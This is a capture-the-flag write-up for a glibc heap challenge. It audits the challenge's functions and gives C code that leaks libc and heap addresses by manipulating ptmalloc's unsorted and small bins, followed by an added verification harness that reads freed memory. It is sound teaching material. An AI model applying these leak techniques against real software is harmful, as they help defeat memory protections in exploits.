ghost in the heap
Audit
delete heap
- after free(), ghost[i] is set to NULL, so there is no double free
add ghost
- asks for a magic value to be filled in, but the following read overwrites it
- the read length is smaller than the maximum allowed length
add heap
- uses scanf, so the FILE struct may come into play
- scanf limits the input length, so the heap cannot be overflowed directly
Leaking libc and heap
Get the ghost chunk linked into the unsorted bin, then free another chunk into the unsorted bin. Provided the two do not coalesce, the unsorted bin list is necessarily rewritten, so the ghost chunk now carries both leaks (its fd points into main_arena in libc, its bk at the freshly freed heap chunk). On the next malloc the ghost chunk is smaller than the requested chunk size, so malloc sorts it into the smallbin, where it is found to satisfy a 0x60 request,
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

/* Reproduction on glibc 2.23-style ptmalloc (no tcache), x86-64.
 * Chunk sizes: malloc(0x50) -> 0x60, malloc(0xa0) -> 0xb0. */
int main(void)
{
    char *p1, *p2, *p3, *ptr;
    ptr = malloc(0x50);
    p1 = malloc(0xa0);
    p2 = malloc(0xa0);
    p3 = malloc(0xa0);
    free(ptr);          /* 0x60 chunk -> fastbin */
    free(p1);           /* 0xb0 chunk -> unsorted bin */
    free(p3);           /* merges into top; the large top triggers malloc_consolidate,
                           which merges the fastbin chunk with p1's chunk: 0x110 in the unsorted bin */
    p1 = malloc(0xa0);  /* the 0x110 chunk is split: the unsorted bin now points at a chunk of only 0x60 */
    p3 = malloc(0xa0);  /* malloc sorts that 0x60 chunk into the smallbin */
    free(p2);           /* coalesces backwards with the 0x60 chunk: 0x110 in the unsorted bin again */
    p2 = malloc(0xa0);  /* last_remainder split: a fresh 0x60 chunk sits in the unsorted bin, fd/bk -> main_arena */
    free(p1);           /* a second chunk enters the unsorted bin ahead of it, so its bk is now a heap address */
    ptr = malloc(0x50); /* exact fit: the 0x60 chunk comes back with both pointers still in place */
    printf("libc: %p heap: %p\n", ((void * volatile *)ptr)[0], ((void * volatile *)ptr)[1]);
    return 0;
}
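The following is an added example, not the challenge's code and not part of the original note: it wraps the sequence above in a function and then checks that the two qwords left in the recovered 0x60 ghost chunk really are a pointer into libc and the header address of the chunk freed last. It assumes x86-64 glibc ptmalloc2 with no tcache in play (glibc 2.23-era, or glibc 2.26 to 2.31 started with GLIBC_TUNABLES=glibc.malloc.tcache_count=0); on a tcache allocator it reports that the unchanged sequence does not apply. The names `word_kind`, `fastbin_first`, `ghost_leak` and `ghost_leak_ok`, the free()-fingerprint probe and the distance windows are this example's own assumptions, not glibc interfaces.

```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

/* Added example (not the challenge's code). Assumes x86-64 glibc ptmalloc2
 * without tcache; the probe and the windows below are heuristics. */

enum word_kind { WORD_UNKNOWN = 0, WORD_LIBC = 1, WORD_HEAP = 2 };

/* Classify a leaked qword by distance from references we hold: main_arena
 * lives in libc's data segment a few KiB from the stdio objects, so a word
 * within 4 MiB of stdout is taken as libc; a word within 1 MiB of a chunk
 * we own is taken as heap. (Assumed windows.) */
enum word_kind word_kind(uintptr_t w, uintptr_t libc_ref, uintptr_t heap_ref)
{
    const uintptr_t LIBC_WIN = 0x400000, HEAP_WIN = 0x100000;
    if (w + LIBC_WIN >= libc_ref && w <= libc_ref + LIBC_WIN) return WORD_LIBC;
    if (w + HEAP_WIN >= heap_ref && w <= heap_ref + HEAP_WIN) return WORD_HEAP;
    return WORD_UNKNOWN;
}

static void *kept[2];  /* probe chunks, taken back and held so they stay out of the bins */

/* Fingerprint free(): after freeing two 0x60 chunks, the second one's first
 * qword is the first chunk's *header* address in a plain fastbin
 * (glibc <= 2.25, or tcache disabled), the first chunk's *user* pointer in
 * tcache (2.26-2.31), and a safe-linking-mangled value from 2.32 on. */
int fastbin_first(void)
{
    static int cached = -1;
    if (cached >= 0) return cached;
    char *a = malloc(0x50), *b = malloc(0x50);
    free(a);
    free(b);
    uintptr_t next = *(volatile uintptr_t *)b;  /* deliberate read of freed memory */
    cached = (next == (uintptr_t)a - 0x10);
    kept[0] = malloc(0x50);  /* reclaim both so they do not disturb the sequence */
    kept[1] = malloc(0x50);
    return cached;
}

/* The note's sequence. out[0]/out[1] receive the ghost chunk's fd/bk,
 * *heap_chunk the header address the bk is expected to point at. */
void ghost_leak(uintptr_t out[2], uintptr_t *heap_chunk)
{
    char *ptr, *p1, *p2, *p3;
    ptr = malloc(0x50);  /* A, 0x60 */
    p1 = malloc(0xa0);   /* B, 0xb0 */
    p2 = malloc(0xa0);   /* C, 0xb0 */
    p3 = malloc(0xa0);   /* D, 0xb0, adjacent to top */
    free(ptr);           /* A -> fastbin */
    free(p1);            /* B -> unsorted bin */
    free(p3);            /* D merges into top; top >= 64 KiB -> malloc_consolidate merges A+B into 0x110 */
    p1 = malloc(0xa0);   /* 0x110 split: p1 = A again, 0x60 remainder (the ghost) left in unsorted */
    p3 = malloc(0xa0);   /* remainder sorted into smallbin 0x60; p3 carved from top */
    free(p2);            /* C coalesces backwards with the 0x60 chunk -> 0x110 in unsorted */
    p2 = malloc(0xa0);   /* last_remainder split: new 0x60 ghost in unsorted, fd/bk -> main_arena */
    free(p1);            /* A enters unsorted ahead of the ghost, so ghost->bk = A's header */
    ptr = malloc(0x50);  /* exact fit: ghost returned with fd/bk untouched */
    out[0] = ((volatile uintptr_t *)ptr)[0];
    out[1] = ((volatile uintptr_t *)ptr)[1];
    *heap_chunk = (uintptr_t)p1 - 0x10;
    (void)p2; (void)p3;
}

/* 1: both words verified; 0: sequence ran but the words do not match;
 * -1: tcache is in play, so the unchanged sequence does not apply.
 * Memoised because the sequence needs the fresh-heap layout. */
int ghost_leak_ok(void)
{
    static int cached = -2;
    if (cached != -2) return cached;
    if (!fastbin_first()) return cached = -1;
    uintptr_t w[2], a_chunk;
    ghost_leak(w, &a_chunk);
    int libc_ok = word_kind(w[0], (uintptr_t)stdout, a_chunk) == WORD_LIBC;
    int heap_ok = (w[1] == a_chunk);
    return cached = (libc_ok && heap_ok);
}

int main(void)
{
    int r = ghost_leak_ok();  /* runs before any stdio buffer is allocated */
    if (r < 0)
        puts("tcache in play: the note's sequence targets glibc 2.23-style ptmalloc");
    else
        printf("ghost leak %s\n", r ? "verified" : "not reproduced");
    return r == 1 ? 0 : 1;
}
```

The probe runs first and its two chunks are taken back, so they sit in-use at the start of the heap and the four chunks of the sequence are carved from top exactly as in the note; all reads of leaked words go through volatile pointers so the compiler cannot fold a read of freshly allocated memory.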